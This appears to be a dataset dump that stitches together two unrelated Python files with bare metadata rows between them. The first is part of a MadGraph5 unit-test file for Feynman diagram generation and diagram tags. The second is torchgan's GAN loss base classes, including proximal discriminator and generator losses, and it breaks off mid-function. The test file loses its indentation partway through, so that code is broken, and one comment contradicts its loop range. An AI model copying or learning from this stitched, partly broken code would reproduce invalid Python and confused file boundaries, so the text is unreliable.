        my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});

        # Expected process counts per multiplicity: requiring a photon
        # s-channel eliminates all pure-QCD channels.
        goal_number_processes = [8, 24]

        # goal_valid_procs[nfs-2] = [(leg ids, number of diagrams), ...]
        goal_valid_procs = []
        goal_valid_procs.append([([1, -1, 1, -1], 1),
                                 ([1, -1, 2, -2], 1),
                                 ([-1, 1, 1, -1], 1),
                                 ([-1, 1, 2, -2], 1),
                                 ([2, -2, 1, -1], 1),
                                 ([2, -2, 2, -2], 1),
                                 ([-2, 2, 1, -1], 1),
                                 ([-2, 2, 2, -2], 1)])
        goal_valid_procs.append([([1, -1, 1, -1, 21], 4),
                                 ([1, -1, 2, -2, 21], 4),
                                 ([1, 21, 1, 1, -1], 4),
                                 ([1, 21, 1, 2, -2], 2),
                                 ([-1, 1, 1, -1, 21], 4),
                                 ([-1, 1, 2, -2, 21], 4),
                                 ([-1, 21, 1, -1, -1], 4),
                                 ([-1, 21, -1, 2, -2], 2),
                                 ([2, -2, 1, -1, 21], 4),
                                 ([2, -2, 2, -2, 21], 4),
                                 ([2, 21, 1, -1, 2], 2),
                                 ([2, 21, 2, 2, -2], 4),
                                 ([-2, 2, 1, -1, 21], 4),
                                 ([-2, 2, 2, -2, 21], 4),
                                 ([-2, 21, 1, -1, -2], 2),
                                 ([-2, 21, 2, -2, -2], 4),
                                 ([21, 1, 1, 1, -1], 4),
                                 ([21, 1, 1, 2, -2], 2),
                                 ([21, -1, 1, -1, -1], 4),
                                 ([21, -1, -1, 2, -2], 2),
                                 ([21, 2, 1, -1, 2], 2),
                                 ([21, 2, 2, 2, -2], 4),
                                 ([21, -2, 1, -1, -2], 2),
                                 ([21, -2, 2, -2, -2], 4)])

        for nfs in range(2, max_fs + 1):

            # Define the multiprocess with the required photon s-channel
            my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * (2 + nfs)])

            my_multi_leglist[0].set('state', False)
            my_multi_leglist[1].set('state', False)

            my_process_definition = base_objects.ProcessDefinition({'legs':my_multi_leglist,
                                                  'model':self.mymodel,
                                                  'required_s_channels': [[22]]})
            my_multiprocess = diagram_generation.MultiProcess(\
                {'process_definitions':\
                 base_objects.ProcessDefinitionList([my_process_definition])})

            if nfs <= 3:
                self.assertEqual(len(my_multiprocess.get('amplitudes')),
                                 goal_number_processes[nfs - 2])

            # Calculate diagrams for all processes
            #amplitudes = my_multiprocess.get('amplitudes')

            valid_procs = [([leg.get('id') for leg in \
                             amplitude.get('process').get('legs')],
                            len(amplitude.get('diagrams'))) \
                           for amplitude in my_multiprocess.get('amplitudes')]

            if nfs <= 3:
                self.assertEqual(valid_procs, goal_valid_procs[nfs - 2])
    def test_wrong_multiparticle(self):
        """Check that an exception is raised for empty multipart amplitudes"""

        max_fs = 2 # 3

        # Initial state holds only antiquarks, final state only quarks, so
        # no charge-conserving process exists in this model.
        p = [-1, -2]
        j = [ 1, 2]

        my_multi_init = base_objects.MultiLeg({'ids': p, 'state': False});
        my_multi_final = base_objects.MultiLeg({'ids': j, 'state': True});

        goal_number_processes = [0, 0]

        for nfs in range(2, max_fs + 1):

            # Define the multiprocess
            my_multi_leglist = base_objects.MultiLegList(
                [copy.copy(leg) for leg in [my_multi_init] * 2] + \
                [copy.copy(leg) for leg in [my_multi_final] * nfs]
                )

            my_process_definition = base_objects.ProcessDefinition({'legs':my_multi_leglist,
                                                                    'model':self.mymodel}
                                                                   )
            my_multiprocess = diagram_generation.MultiProcess(\
                {'process_definitions':\
                 base_objects.ProcessDefinitionList([my_process_definition])})

            if nfs <= 3:
                # Requesting amplitudes for an empty multiprocess must raise
                self.assertRaises(MadGraph5Error,
                                  my_multiprocess.get, 'amplitudes')
    def test_crossing_uux_gg(self):
        """Test the number of diagram generated for uu~>gg (s, t and u channels)
        """

        # Base process: d~ d > g g
        myleglist = base_objects.LegList()

        myleglist.append(base_objects.Leg({'id':-1,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':1,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':21,
                                           'state':True}))
        myleglist.append(base_objects.Leg({'id':21,
                                           'state':True}))

        myproc = base_objects.Process({'legs':myleglist,
                                       'model':self.mymodel})

        myamplitude = diagram_generation.Amplitude(myproc)

        # Crossed process: d g > d g, obtained from the base amplitude via
        # the given leg-number permutations rather than regenerated.
        myleglist = base_objects.LegList()

        myleglist.append(base_objects.Leg({'id':1,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':21,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':1,
                                           'state':True}))
        myleglist.append(base_objects.Leg({'id':21,
                                           'state':True}))

        crossproc = base_objects.Process({'legs':myleglist,
                                          'model':self.mymodel})

        crossamp = diagram_generation.MultiProcess.cross_amplitude(myamplitude,
                                                                   crossproc,
                                                                   [3,4,2,1],
                                                                   [2,4,1,3])

        # Expected leg numbers and states per vertex of the three crossed
        # diagrams (s, t and u channels).
        crossed_numbers = [[[3, 1, 1], [2, 4, 1]],
                           [[3, 2, 2], [1, 4, 2]],
                           [[3, 4, 3], [1, 2, 3]]]
        crossed_states = [[[True, False, False], [False, True, False]],
                          [[True, False, False], [False, True, False]],
                          [[True, True, True], [False, False, True]]]

        for idiag, diagram in enumerate(crossamp.get('diagrams')):
            self.assertEqual([[l.get('number') for l in v.get('legs')] \
                              for v in diagram.get('vertices')],
                             crossed_numbers[idiag])
            self.assertEqual([[l.get('state') for l in v.get('legs')] \
                              for v in diagram.get('vertices')],
                             crossed_states[idiag])
#===============================================================================
# TestDiagramTag
#===============================================================================
class TestDiagramTag(unittest.TestCase):
    """Test class for the DiagramTag class"""

    def setUp(self):
        # Full SM model imported once per test; used by all DiagramTag tests.
        self.base_model = import_ufo.import_model('sm')
def test_diagram_tag_gg_ggg(self):
"""Test the diagram tag for gg > ggg"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':21,
'state':False}))
myleglist.append(base_objects.Leg({'id':21,
'state':False}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':self.base_model})
myamplitude = diagram_generation.Amplitude(myproc)
tags = []
permutations = []
diagram_classes = []
for idiag, diagram in enumerate(myamplitude.get('diagrams')):
tag = diagram_generation.DiagramTag(diagram)
try:
ind = tags.index(tag)
except:
diagram_classes.append([idiag + 1])
permutations.append([tag.get_external_numbers()])
tags.append(tag)
else:
diagram_classes[ind].append(idiag + 1)
permutations[ind].append(tag.get_external_numbers())
permutations = [[diagram_generation.DiagramTag.reorder_permutation(p, perms[0])\
for p in perms] for perms in permutations]
goal_classes = [[1, 2, 3],
[4],
[5, 6, 9, 10, 13, 14],
[7, 11, 15],
[8, 12, 16],
[17, 18, 19],
[20, 21, 22],
[23, 24, 25]]
goal_perms = [[[0, 1, 2, 3, 4], [0, 1, 2, 4, 3], [0, 1, 4, 2, 3]],
[[0, 1, 2, 3, 4]],
[[0, 1, 2, 3, 4], [0, 1, 2, 4, 3], [0, 1, 3, 2, 4],
[0, 1, 4, 2, 3], [0, 1, 3, 4, 2], [0, 1, 4, 3, 2]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4], [0, 1, 3, 4, 2]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4], [0, 1, 3, 4, 2]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4], [0, 1, 3, 4, 2]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4], [0, 1, 3, 4, 2]],
[[0, 1, 2, 3, 4], [0, 1, 2, 4, 3], [0, 1, 4, 2, 3]]]
for i in range(len(diagram_classes)):
self.assertEqual(diagram_classes[i], goal_classes[i])
self.assertEqual(permutations[i], goal_perms[i])
def test_diagram_tag_uu_uug(self):
"""Test diagram tag for uu>uug"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':2,
'state':False}))
myleglist.append(base_objects.Leg({'id':2,
'state':False}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':self.base_model})
myamplitude = diagram_generation.Amplitude(myproc)
tags = []
permutations = []
diagram_classes = []
for idiag, diagram in enumerate(myamplitude.get('diagrams')):
tag = diagram_generation.DiagramTag(diagram)
try:
ind = tags.index(tag)
except:
diagram_classes.append([idiag + 1])
permutations.append([tag.get_external_numbers()])
tags.append(tag)
else:
diagram_classes[ind].append(idiag + 1)
permutations[ind].append(tag.get_external_numbers())
permutations = [[diagram_generation.DiagramTag.reorder_permutation(p, perms[0])\
for p in perms] for perms in permutations]
goal_classes = [[1, 8], [2, 9], [3, 10], [4, 11], [5, 12], [6, 13],
[7, 14], [15, 18], [16, 19], [17, 20], [21, 24],
[22, 25], [23, 26]]
goal_perms = [[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]]]
for i in range(len(diagram_classes)):
self.assertEqual(diagram_classes[i], goal_classes[i])
self.assertEqual(permutations[i], goal_perms[i])
def test_reorder_permutation(self):
"""Test the reorder_permutation routine"""
perm1 = [2,3,4,5,1]
perm2 = [3,5,2,1,4]
goal = [3,2,4,1,0]
self.assertEqual(diagram_generation.DiagramTag.reorder_permutation(\
perm1, perm2), goal)
def test_diagram_tag_to_diagram_uux_nglue(self):
"""Test diagrams from DiagramTags for u u~ > n g
"""
# Test 2, 3, 4 and 5 gluons in the final state
for ngluon in range (2, 4):
# Create the amplitude
myleglist = base_objects.LegList([\
base_objects.Leg({'id':2, 'state':False}),
base_objects.Leg({'id':-2, 'state':False})])
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluon)
myproc = base_objects.Process({'legs':myleglist,
'orders':{'QCD':ngluon, 'QED': 0},
'model':self.base_model})
myamplitude = diagram_generation.Amplitude(myproc)
diagrams = myamplitude.get('diagrams')
diagram_tags = [diagram_generation.DiagramTag(d) \
for d in diagrams]
#print myamplitude.get('process').nice_string()
for i,(d,dtag) in enumerate(zip(diagrams, diagram_tags)):
#print '%3r: ' % (i+1),d.nice_string()
#print 'new: ',dtag.diagram_from_tag(self.base_model).nice_string()
# Check that the resulting diagram is recreated in the same way
# from the diagram tag (by checking the diagram tag)
self.assertEqual(dtag,
diagram_generation.DiagramTag(\
dtag.diagram_from_tag(self.base_model)))
| 41.621412
| 112
| 0.41004
| 14,127
| 160,950
| 4.538756
| 0.042472
| 0.096929
| 0.057269
| 0.040674
| 0.826775
| 0.800543
| 0.773
| 0.750682
| 0.720832
| 0.690435
| 0
| 0.046447
| 0.450488
| 160,950
| 3,866
| 113
| 41.632178
| 0.67852
| 0.05616
| 0
| 0.709159
| 0
| 0
| 0.087661
| 0.00097
| 0
| 0
| 0
| 0
| 0.042037
| 1
| 0.018797
| false
| 0
| 0.004443
| 0
| 0.035202
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73cdcce53f7ffcece92d9bf0cf9baf8ba6165629
| 25,813
|
py
|
Python
|
torchgan/losses/loss.py
|
proximal-dg/proximal_dg
|
000e925c7daab099b2c3735f99e65e6b2a00a799
|
[
"MIT"
] | 13
|
2021-05-12T05:37:20.000Z
|
2022-03-30T17:05:47.000Z
|
torchgan/losses/loss.py
|
proximal-dg/proximal_dg
|
000e925c7daab099b2c3735f99e65e6b2a00a799
|
[
"MIT"
] | 3
|
2021-10-20T04:51:36.000Z
|
2022-02-25T13:37:32.000Z
|
torchgan/losses/loss.py
|
proximal-dg/proximal_dg
|
000e925c7daab099b2c3735f99e65e6b2a00a799
|
[
"MIT"
] | 1
|
2021-12-28T17:03:08.000Z
|
2021-12-28T17:03:08.000Z
|
import torch
import torch.nn as nn
import copy
from torch import autograd
from math import log
__all__ = ["GeneratorLoss", "DiscriminatorLoss","ProximalDiscriminatorLoss","ProximalGeneratorLoss"]
class GeneratorLoss(nn.Module):
    r"""Base class for all generator losses.

    .. note:: All Losses meant to be minimized for optimizing the Generator must subclass this.

    Args:
        reduction (str, optional): Specifies the reduction to apply to the output.
            If ``none`` no reduction will be applied. If ``mean`` the outputs are averaged over batch size.
            If ``sum`` the elements of the output are summed.
        override_train_ops (function, optional): Function to be used in place of the default ``train_ops``
        eval_only (bool, optional): If ``True``, ``train_ops`` computes the loss but skips the
            backward pass and the optimizer step.
    """

    def __init__(self, reduction="mean", override_train_ops=None, eval_only=False):
        super(GeneratorLoss, self).__init__()
        self.reduction = reduction
        self.override_train_ops = override_train_ops
        self.arg_map = {}
        self.eval_only = eval_only

    def set_arg_map(self, value):
        r"""Updates the ``arg_map`` for passing a different value to the ``train_ops``.

        Args:
            value (dict): A mapping of the ``argument name`` in the method signature and the
                variable name in the ``Trainer`` it corresponds to.

        .. note::
            If the ``train_ops`` signature is
            ``train_ops(self, gen, disc, optimizer_generator, device, batch_size, labels=None)``
            then we need to map ``gen`` to ``generator`` and ``disc`` to ``discriminator``.
            In this case we make the following function call
            ``loss.set_arg_map({"gen": "generator", "disc": "discriminator"})``.
        """
        self.arg_map.update(value)

    def train_ops(
        self,
        generator,
        discriminator,
        optimizer_generator,
        device,
        batch_size,
        labels=None,
    ):
        r"""Defines the standard ``train_ops`` used by most losses. Losses which have a different
        training procedure can either ``subclass`` it **(recommended approach)** or make use of
        ``override_train_ops`` argument.

        The ``standard optimization algorithm`` for the ``generator`` defined in this train_ops
        is as follows:

        1. :math:`fake = generator(noise)`
        2. :math:`value = discriminator(fake)`
        3. :math:`loss = loss\_function(value)`
        4. Backpropagate by computing :math:`\nabla loss`
        5. Run a step of the optimizer for generator

        Args:
            generator (torchgan.models.Generator): The model to be optimized.
            discriminator (torchgan.models.Discriminator): The discriminator which judges the
                performance of the generator.
            optimizer_generator (torch.optim.Optimizer): Optimizer which updates the ``parameters``
                of the ``generator``.
            device (torch.device): Device on which the ``generator`` and ``discriminator`` is present.
            batch_size (int): Batch Size of the data infered from the ``DataLoader`` by the ``Trainer``.
            labels (torch.Tensor, optional): Labels for the data.

        Returns:
            Scalar value of the loss.
        """
        if self.override_train_ops is not None:
            # NOTE(review): ``self`` is not forwarded to the override here,
            # while DiscriminatorLoss.train_ops does forward it. Preserved
            # as-is for backward compatibility with existing overrides.
            return self.override_train_ops(
                generator,
                discriminator,
                optimizer_generator,
                device,
                batch_size,
                labels,
            )

        if labels is None and generator.label_type == "required":
            raise Exception("GAN model requires labels for training")
        noise = torch.randn(batch_size, generator.encoding_dims, device=device)
        optimizer_generator.zero_grad()
        if generator.label_type == "generated":
            label_gen = torch.randint(
                0, generator.num_classes, (batch_size,), device=device
            )
        if generator.label_type == "none":
            fake = generator(noise)
        elif generator.label_type == "required":
            fake = generator(noise, labels)
        elif generator.label_type == "generated":
            fake = generator(noise, label_gen)
        else:
            # Previously an unexpected label_type fell through and produced an
            # obscure NameError on ``fake``; fail fast with a clear message.
            raise ValueError(
                "Unsupported generator.label_type: {!r}".format(generator.label_type)
            )
        if discriminator.label_type == "none":
            dgz = discriminator(fake)
        elif generator.label_type == "generated":
            dgz = discriminator(fake, label_gen)
        else:
            dgz = discriminator(fake, labels)
        loss = self.forward(dgz)
        # Stash the last computed loss for inspection by callers.
        self.loss = loss
        if not self.eval_only:
            loss.backward()
            optimizer_generator.step()
        # NOTE(avik-pal): This will error if reduction is 'none'
        return loss.item()
class DiscriminatorLoss(nn.Module):
    r"""Base class for all discriminator losses.

    .. note:: All Losses meant to be minimized for optimizing the Discriminator must subclass this.

    Args:
        reduction (str, optional): Specifies the reduction to apply to the output.
            If ``none`` no reduction will be applied. If ``mean`` the outputs are averaged over batch size.
            If ``sum`` the elements of the output are summed.
        override_train_ops (function, optional): Function to be used in place of the default ``train_ops``
        eval_only (bool, optional): If ``True``, ``train_ops`` computes the loss but skips the
            backward pass and the optimizer step.
    """

    def __init__(self, reduction="mean", override_train_ops=None, eval_only=False):
        super(DiscriminatorLoss, self).__init__()
        self.reduction = reduction
        self.override_train_ops = override_train_ops
        self.arg_map = {}
        self.eval_only = eval_only

    def set_arg_map(self, value):
        r"""Updates the ``arg_map`` for passing a different value to the ``train_ops``.

        Args:
            value (dict): A mapping of the ``argument name`` in the method signature and the
                variable name in the ``Trainer`` it corresponds to.

        .. note::
            If the ``train_ops`` signature is
            ``train_ops(self, gen, disc, optimizer_discriminator, device, batch_size, labels=None)``
            then we need to map ``gen`` to ``generator`` and ``disc`` to ``discriminator``.
            In this case we make the following function call
            ``loss.set_arg_map({"gen": "generator", "disc": "discriminator"})``.
        """
        self.arg_map.update(value)

    def train_ops(
        self,
        generator,
        discriminator,
        optimizer_discriminator,
        real_inputs,
        device,
        labels=None,
    ):
        r"""Defines the standard ``train_ops`` used by most losses. Losses which have a different
        training procedure can either ``subclass`` it **(recommended approach)** or make use of
        ``override_train_ops`` argument.

        The ``standard optimization algorithm`` for the ``discriminator`` defined in this train_ops
        is as follows:

        1. :math:`fake = generator(noise)`
        2. :math:`value_1 = discriminator(fake)`
        3. :math:`value_2 = discriminator(real)`
        4. :math:`loss = loss\_function(value_1, value_2)`
        5. Backpropagate by computing :math:`\nabla loss`
        6. Run a step of the optimizer for discriminator

        Args:
            generator (torchgan.models.Generator): The model to be optimized.
            discriminator (torchgan.models.Discriminator): The discriminator which judges the
                performance of the generator.
            optimizer_discriminator (torch.optim.Optimizer): Optimizer which updates the ``parameters``
                of the ``discriminator``.
            real_inputs (torch.Tensor): The real data to be fed to the ``discriminator``.
            device (torch.device): Device on which the ``generator`` and ``discriminator`` is present.
            labels (torch.Tensor, optional): Labels for the data.

        Returns:
            Scalar value of the loss.
        """
        if self.override_train_ops is not None:
            # NOTE(review): unlike GeneratorLoss.train_ops, the override here
            # receives ``self`` as first argument — preserved for backward
            # compatibility with existing overrides.
            return self.override_train_ops(
                self,
                generator,
                discriminator,
                optimizer_discriminator,
                real_inputs,
                device,
                labels,
            )

        if labels is None and (
            generator.label_type == "required"
            or discriminator.label_type == "required"
        ):
            raise Exception("GAN model requires labels for training")
        batch_size = real_inputs.size(0)
        noise = torch.randn(batch_size, generator.encoding_dims, device=device)
        if generator.label_type == "generated":
            label_gen = torch.randint(
                0, generator.num_classes, (batch_size,), device=device
            )
        optimizer_discriminator.zero_grad()
        # Score the real batch.
        if discriminator.label_type == "none":
            dx = discriminator(real_inputs)
        elif discriminator.label_type == "required":
            dx = discriminator(real_inputs, labels)
        else:
            # NOTE(review): this branch assumes generator.label_type is
            # "generated"; otherwise ``label_gen`` is undefined here.
            dx = discriminator(real_inputs, label_gen)
        # Generate and score a fake batch (detached: only D is updated).
        if generator.label_type == "none":
            fake = generator(noise)
        elif generator.label_type == "required":
            fake = generator(noise, labels)
        else:
            fake = generator(noise, label_gen)
        if discriminator.label_type == "none":
            dgz = discriminator(fake.detach())
        elif generator.label_type == "generated":
            dgz = discriminator(fake.detach(), label_gen)
        else:
            dgz = discriminator(fake.detach(), labels)
        loss = self.forward(dx, dgz)
        # Stash the last computed loss for inspection by callers.
        self.loss = loss
        if not self.eval_only:
            loss.backward()
            optimizer_discriminator.step()
        # NOTE(avik-pal): This will error if reduction is 'none'
        return loss.item()
class ProximalDiscriminatorLoss(DiscriminatorLoss):
    r"""Base class for all proximal discriminator losses.

    .. note:: All Losses meant to be minimized for optimizing the Discriminator must subclass this.

    Args:
        reduction (str, optional): Specifies the reduction to apply to the output.
            If ``none`` no reduction will be applied. If ``mean`` the outputs are averaged over batch size.
            If ``sum`` the elements of the output are summed.
        override_train_ops (function, optional): Function to be used in place of the default ``train_ops``
        eval_only (bool, optional): Stored by the parent class; note that this train_ops
            always performs the backward pass (see note inside ``train_ops``).
        lamda_prox (float, optional): Weight of the proximal gradient penalty term.
        steps (int, optional): Number of discriminator updates performed per ``train_ops`` call.
    """

    def __init__(self, reduction="mean", override_train_ops=None, eval_only=False,
                 lamda_prox=0.10, steps=10):
        super(ProximalDiscriminatorLoss, self).__init__(
            reduction, override_train_ops, eval_only
        )
        self.lamda_prox = lamda_prox
        self.steps = steps
        # Optional (min, max) weight-clipping range. The original code read
        # ``self.clip`` in train_ops without ever defining it, which raised an
        # AttributeError on every call; default to None (no clipping).
        # Subclasses or users may assign a (low, high) tuple.
        self.clip = None

    def set_arg_map(self, value):
        r"""Updates the ``arg_map`` for passing a different value to the ``train_ops``.

        Args:
            value (dict): A mapping of the ``argument name`` in the method signature and the
                variable name in the ``Trainer`` it corresponds to.

        .. note::
            If the ``train_ops`` signature is
            ``train_ops(self, gen, disc, optimizer_discriminator, device, batch_size, labels=None)``
            then we need to map ``gen`` to ``generator`` and ``disc`` to ``discriminator``.
            In this case we make the following function call
            ``loss.set_arg_map({"gen": "generator", "disc": "discriminator"})``.
        """
        self.arg_map.update(value)

    def train_ops(
        self,
        generator,
        discriminator,
        optimizer_discriminator,
        real_inputs,
        device,
        labels=None,
    ):
        r"""Runs ``self.steps`` discriminator updates, each regularized by a proximal penalty.

        A frozen copy of the discriminator is taken at entry; every step adds
        ``lamda_prox`` times the mean squared mismatch of input gradients between the live
        discriminator and that frozen anchor to the usual loss ``forward(dx, dgz)``.

        Args:
            generator (torchgan.models.Generator): The model to be optimized.
            discriminator (torchgan.models.Discriminator): The discriminator which judges the
                performance of the generator.
            optimizer_discriminator (torch.optim.Optimizer): Optimizer which updates the
                ``parameters`` of the ``discriminator``.
            real_inputs (torch.Tensor): The real data to be fed to the ``discriminator``.
            device (torch.device): Device on which the ``generator`` and ``discriminator`` is present.
            labels (torch.Tensor, optional): Labels for the data.

        Returns:
            Scalar value of the last step's loss.
        """
        if self.override_train_ops is not None:
            return self.override_train_ops(
                self,
                generator,
                discriminator,
                optimizer_discriminator,
                real_inputs,
                device,
                labels,
            )

        # Gradients w.r.t. the inputs are needed for the proximal penalty.
        real_inputs.requires_grad = True
        if labels is None and (
            generator.label_type == "required"
            or discriminator.label_type == "required"
        ):
            raise Exception("GAN model requires labels for training")
        # Frozen snapshot of the discriminator used as the proximal anchor.
        proximal_discriminator = type(discriminator)(
            discriminator.in_size,
            discriminator.in_channels,
            discriminator.step_channels,
            discriminator.batchnorm,
            discriminator.nonlinearity,
            discriminator.last_nonlinearity,
            discriminator.label_type,
        ).to(device)
        proximal_discriminator.load_state_dict(discriminator.state_dict())
        batch_size = real_inputs.size(0)
        for step in range(self.steps):
            # Optional WGAN-style weight clipping (``self.clip`` now defaults
            # to None in __init__, fixing the original AttributeError).
            if self.clip is not None:
                for p in discriminator.parameters():
                    p.data.clamp_(self.clip[0], self.clip[1])
            noise = torch.randn(batch_size, generator.encoding_dims, device=device)
            if generator.label_type == "generated":
                label_gen = torch.randint(
                    0, generator.num_classes, (batch_size,), device=device
                )
            optimizer_discriminator.zero_grad()
            if discriminator.label_type == "none":
                dx = discriminator(real_inputs)
                dx_prox = proximal_discriminator(real_inputs)
            elif discriminator.label_type == "required":
                dx = discriminator(real_inputs, labels)
                dx_prox = proximal_discriminator(real_inputs, labels)
            else:
                # NOTE(review): assumes generator.label_type == "generated",
                # otherwise ``label_gen`` is undefined here.
                dx = discriminator(real_inputs, label_gen)
                dx_prox = proximal_discriminator(real_inputs, label_gen)
            if generator.label_type == "none":
                fake = generator(noise)
            elif generator.label_type == "required":
                fake = generator(noise, labels)
            else:
                fake = generator(noise, label_gen)
            if discriminator.label_type == "none":
                dgz = discriminator(fake.detach())
            elif generator.label_type == "generated":
                dgz = discriminator(fake.detach(), label_gen)
            else:
                dgz = discriminator(fake.detach(), labels)
            # Input-gradient mismatch between the live and anchored D.
            grad_dx = autograd.grad(
                torch.unbind(dx), real_inputs,
                create_graph=False, retain_graph=True)[0]
            grad_dx_prox = autograd.grad(
                torch.unbind(dx_prox), real_inputs,
                create_graph=False, retain_graph=True)[0]
            # NOTE(review): dim=(2, 3) assumes 4-D (N, C, H, W) inputs — confirm.
            penalty = torch.mean(torch.square(
                torch.norm(grad_dx_prox - grad_dx, dim=(2, 3))))
            loss = self.forward(dx, dgz) + self.lamda_prox * penalty
            self.loss = loss
            # NOTE(review): unlike the parent class, ``eval_only`` is not
            # honoured here — backward/step always run (kept from original).
            loss.backward()
            optimizer_discriminator.step()
        return loss.item()
class ProximalGeneratorLoss(GeneratorLoss):
    r"""Base class for all proximal generator losses.

    .. note:: All Losses meant to be minimized for optimizing the Generator must subclass this.

    Args:
        reduction (str, optional): Specifies the reduction to apply to the output.
            If ``none`` no reduction will be applied. If ``mean`` the outputs are averaged over batch size.
            If ``sum`` the elements of the output are summed.
        override_train_ops (function, optional): Function to be used in place of the default ``train_ops``
        eval_only (bool, optional): If ``True``, the final generator update skips the backward
            pass and optimizer step (the inner discriminator loop still updates).
        lamda_prox (float, optional): Weight of the proximal gradient penalty added to the
            discriminator loss inside the inner update loop.
        steps (int, optional): Number of inner discriminator updates before the generator update.
        proximal_discriminator_loss (DiscriminatorLoss, optional): Loss whose ``forward`` drives
            the inner discriminator updates; its ``clip`` attribute, if present, enables
            weight clipping.
    """
    def __init__(self, reduction="mean", override_train_ops=None,eval_only=False,lamda_prox=0.10,steps=10,proximal_discriminator_loss=None):
        super(ProximalGeneratorLoss, self).__init__(reduction,override_train_ops,eval_only)
        # NOTE(review): the four attributes below are already set by the
        # parent __init__; the re-assignment is redundant but kept as-is.
        self.reduction = reduction
        self.override_train_ops = override_train_ops
        self.arg_map = {}
        self.eval_only = eval_only
        self.lamda_prox = lamda_prox
        self.steps = steps
        self.proximal_discriminator_loss = proximal_discriminator_loss
    def set_arg_map(self, value):
        r"""Updates the ``arg_map`` for passing a different value to the ``train_ops``.

        Args:
            value (dict): A mapping of the ``argument name`` in the method signature and the
                variable name in the ``Trainer`` it corresponds to.

        .. note::
            If the ``train_ops`` signature is
            ``train_ops(self, gen, disc, optimizer_generator, device, batch_size, labels=None)``
            then we need to map ``gen`` to ``generator`` and ``disc`` to ``discriminator``.
            In this case we make the following function call
            ``loss.set_arg_map({"gen": "generator", "disc": "discriminator"})``.
        """
        self.arg_map.update(value)
    def train_ops(
        self,
        real_inputs,
        generator,
        discriminator,
        optimizer_discriminator,
        optimizer_generator,
        device,
        batch_size,
        labels=None,
    ):
        r"""Runs ``self.steps`` proximal discriminator updates, then one generator update.

        The inner loop trains ``discriminator`` against a frozen copy of itself
        (``prox_discriminator``) using ``self.proximal_discriminator_loss`` plus an
        input-gradient mismatch penalty; the outer step updates the generator with this
        loss's ``forward`` and finally restores the discriminator weights from the frozen copy.

        Args:
            real_inputs (torch.Tensor): The real data fed to the ``discriminator``.
            generator (torchgan.models.Generator): The model to be optimized.
            discriminator (torchgan.models.Discriminator): The discriminator which judges the
                performance of the generator.
            optimizer_discriminator (torch.optim.Optimizer): Optimizer for the ``discriminator``.
            optimizer_generator (torch.optim.Optimizer): Optimizer for the ``generator``.
            device (torch.device): Device on which the ``generator`` and ``discriminator`` is present.
            batch_size (int): Batch Size of the data infered from the ``DataLoader`` by the ``Trainer``.
            labels (torch.Tensor, optional): Labels for the data.

        Returns:
            Scalar value of the generator loss.
        """
        if self.override_train_ops is not None:
            # NOTE(review): ``real_inputs`` and ``optimizer_discriminator`` are
            # NOT forwarded to the override — confirm this matches the
            # expected override signature before relying on it.
            return self.override_train_ops(
                generator,
                discriminator,
                optimizer_generator,
                device,
                batch_size,
                labels,
            )
        else:
            # Input gradients are required for the proximal penalty below.
            real_inputs.requires_grad = True
            if labels is None and (
                generator.label_type == "required"
                or discriminator.label_type == "required"
            ):
                raise Exception("GAN model requires labels for training")
            # Frozen copy of the discriminator used as the proximal anchor.
            prox_discriminator = type(discriminator)(discriminator.in_size,discriminator.in_channels,discriminator.step_channels,discriminator.batchnorm,discriminator.nonlinearity,discriminator.last_nonlinearity,discriminator.label_type).to(device)
            prox_discriminator.load_state_dict(discriminator.state_dict())
            for p,q in zip(discriminator.parameters(),prox_discriminator.parameters()):
                q.requires_grad = p.requires_grad
            for step in range(self.steps):
                optimizer_discriminator.zero_grad()
                # Optional weight clipping driven by the inner loss object.
                # NOTE(review): raises TypeError if ``clip`` exists but is
                # None, and AttributeError if proximal_discriminator_loss is
                # None — confirm intended usage.
                if hasattr(self.proximal_discriminator_loss,"clip"):
                    for p in discriminator.parameters():
                        p.data.clamp_(self.proximal_discriminator_loss.clip[0], self.proximal_discriminator_loss.clip[1])
                batch_size = real_inputs.size(0)
                noise = torch.randn(batch_size, generator.encoding_dims, device=device)
                if generator.label_type == "generated":
                    label_gen = torch.randint(
                        0, generator.num_classes, (batch_size,), device=device
                    )
                if discriminator.label_type == "none":
                    dx = discriminator(real_inputs)
                    dx_prox = prox_discriminator(real_inputs)
